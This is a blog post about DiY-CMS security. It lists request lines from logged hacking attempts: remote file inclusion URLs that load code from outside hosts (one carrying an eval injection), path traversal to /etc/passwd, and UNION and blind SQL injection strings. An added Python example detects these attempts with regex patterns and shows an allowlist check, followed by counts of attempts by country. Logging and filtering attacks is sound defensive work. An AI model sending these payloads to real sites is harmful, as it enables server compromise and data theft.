

Yeah! Preventing more than 3000 hacking attempts

By: admin | Date Added: Wednesday 03-11-2010 09:27 am | Readers: 8486 | Comments: 0

Security is one of the most important criteria in any script one would like to use. In this post I will talk about security in DiY-CMS. DiY-CMS has the ability to prevent and record most hacking attempts.
Since April 11th http://www.diy-cms.com has prevented more than 3000 hacking attempts in both the English and the Arabic sections. Bear in mind that these are only the recorded attempts; SQL injection through forms, for example, is prevented but not recorded, for a number of reasons.

Examples of attempts:
Several methods were used to try to hack into DiY-CMS, including remote file inclusion, SQL injection and attempts to access root folders and files.
Here are a few examples:

Remote file inclusion (I replaced the original site names with SITE-NAME):

/mod.php?mod=http://www. SITE-NAME.com.mx/admin/xroot.txt?
/?path=http://stul. SITE-NAME.cz/img/.jancuk/injek.txt??

/mod.php?mod=download&modfile=view_file&downid=1%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://nic. SITE-NAME.edu.cn/media/j1.txt???

/index.php//openi-admin/base/fileloader.php?config[openi_dir]=http://SITE-NAME.co.kr/poll/aipi/id.txt??

/index.php//cms/system/openengine.php?oe_classpath=http://SITE-NAME.org/Scripts/bogel/id1.txt????

/mod.php?mod=http://SITE-NAME.com/admin/images/index.txt?


Accessing root files and folders:
//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00

/mod.php?mod=../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/htdocs
/cgi-bin/logs
/cgi-bin/root

/mod.php?mod=http://jmbioanalises.com.br/Lims/images/g.txt?



SQL injection:
/mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x

/mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x

/mod.php?mod=27%20AND%20ascii(substring((SELECT%20distinct%20table_name%20FROM%20information_schema.tables%20Where%20table_schema=0x202020%20limit%2019,1),3,1))

/mod.php?mod=blog&modfile=index&page=2&start=10%20union%20select%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*%20and%201=1
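The request lines above are exactly what a request filter has to recognise before the value reaches an include() or a database query. The post does not show how DiY-CMS detects or records attempts, so the following Python is an added illustration and not DiY-CMS code: it percent-decodes a request line, sorts it into the three categories listed above plus the bare root-folder probes, tallies a batch of lines (for instance the contents of a log file), and shows the allowlist check on the mod parameter that stops all three classes at the source. The sample requests are taken from the post with the site names already replaced; the last one is a constructed benign request, and the module names in KNOWN_MODULES are an assumption, since the post does not list DiY-CMS's modules.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request lines quoted in the post (site names replaced with SITE-NAME by the
# author); the final entry is a constructed benign request for comparison.
SAMPLE_REQUESTS = [
    "/mod.php?mod=http://www.SITE-NAME.com.mx/admin/xroot.txt?",
    "/?path=http://stul.SITE-NAME.cz/img/.jancuk/injek.txt??",
    "/index.php//cms/system/openengine.php?oe_classpath=http://SITE-NAME.org/Scripts/bogel/id1.txt????",
    "/mod.php?mod=../../../../../../../../../../../../../../../etc/passwd%00",
    "/cgi-bin/root",
    '/mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null%20where%20"x"="x',
    "/mod.php?mod=27%20AND%20ascii(substring((SELECT%20distinct%20table_name%20FROM"
    "%20information_schema.tables%20Where%20table_schema=0x202020%20limit%2019,1),3,1))",
    "/mod.php?mod=blog&modfile=index&page=2&start=10%20union%20select%200,0,0/*%20and%201=1",
    "/mod.php?mod=blog&modfile=index&page=2",
]

# A parameter value that is itself a URL is the signature of remote file inclusion.
RFI_RE = re.compile(r"^\s*(https?|ftp)://", re.I)
# Directory climbing, the NUL byte used to cut off an appended extension, and
# the usual target file of a traversal probe.
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\|\x00|/etc/passwd", re.I)
# Fragments that have no business inside a module name or a page number.
SQLI_RE = re.compile(
    r"\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b|information_schema|/\*|\band\s+1\s*=\s*1\b",
    re.I,
)
# Bare requests for server folders that a CMS never links to.
PROBE_PATHS = {"/cgi-bin/htdocs", "/cgi-bin/logs", "/cgi-bin/root"}

# Assumed module names; the post does not list the real DiY-CMS modules.
KNOWN_MODULES = {"pages", "blog", "download"}


def classify(request: str) -> list[str]:
    """Return the sorted list of attack categories a request line matches."""
    # Decode twice so a double-encoded payload (%252e%252e%252f) is seen as well.
    decoded = unquote(unquote(request))
    parts = urlsplit(decoded)
    params = parse_qsl(parts.query, keep_blank_values=True)
    findings = set()
    if parts.path in PROBE_PATHS:
        findings.add("root-probe")
    if TRAVERSAL_RE.search(decoded):
        findings.add("path-traversal")
    for _name, value in params:
        if RFI_RE.match(value):
            findings.add("remote-file-inclusion")
        if SQLI_RE.search(value):
            findings.add("sql-injection")
    return sorted(findings)


def scan(requests) -> dict[str, int]:
    """Tally categories over a batch of request lines (e.g. a log file's contents)."""
    counts: dict[str, int] = {}
    for line in requests:
        for category in classify(line.strip()):
            counts[category] = counts.get(category, 0) + 1
    return counts


def resolve_module(request: str):
    """Allowlist check for the mod parameter: the hardening side of the filter.

    Returns the module name only if it is a plain identifier on the allowlist,
    otherwise None, so a URL, a traversal string or SQL never reaches include()
    or a query.
    """
    params = dict(parse_qsl(urlsplit(unquote(request)).query, keep_blank_values=True))
    mod = params.get("mod", "pages")
    if re.fullmatch(r"[a-z0-9_]{1,32}", mod) and mod in KNOWN_MODULES:
        return mod
    return None


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(classify(line) or ["clean"], line[:70])
    print(scan(SAMPLE_REQUESTS))
```

Note the division of labour: classify and scan are the recording side (what a file like bugs.txt would be built from), while resolve_module is the prevention side; a request that fails the allowlist should be refused and logged whether or not any signature matched, because the allowlist, not the signature list, is what actually closes the hole.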


Geographic locations:
Attempts were initiated from more than 50 countries. Here is a graph of the top 6 countries from which attempts originated:



And here is the full list of countries from which attempts originated, with the number of attempts:
Brazil => 52
United States => 52
Republic of Korea => 13
Saudi Arabia => 12
Germany => 7
United Kingdom => 7
Oman => 6
Morocco => 6
Algeria => 5
Palestinian Territory => 5
France => 5
Italy => 5
Turkey => 5
Indonesia => 4
Canada => 4
Netherlands => 4
Australia => 4
Russian Federation => 4
Belgium => 3
Kuwait => 3
Bulgaria => 3
Hungary => 3
Iraq => 2
Islamic Republic of Iran => 2
Czech Republic => 2
Poland => 2
Bahamas => 2
Austria => 2
Malaysia => 2
Japan => 2
Slovakia => 1
Ukraine => 1
South Africa => 1
Norway => 1
Belarus => 1
Argentina => 1
Azerbaijan => 1
Peru => 1
Bahrain => 1
Egypt => 1
Denmark => 1
Israel => 1
Thailand => 1
Syrian Arab Republic => 1
Latvia => 1
Martinique => 1
India => 1
Libyan Arab Jamahiriya => 1
Europe => 1
Mexico => 1
Greece => 1
Tunisia => 1


I hope that this post explains how powerful DiY-CMS is when it comes to security and preventing hacking attempts, and I will always add more security measures to it.

If you want to check the types of hacking attempts your site is getting, you can check the “html/bugs.txt” file for the list of all hacking attempts.


Tags: prevent-hacking-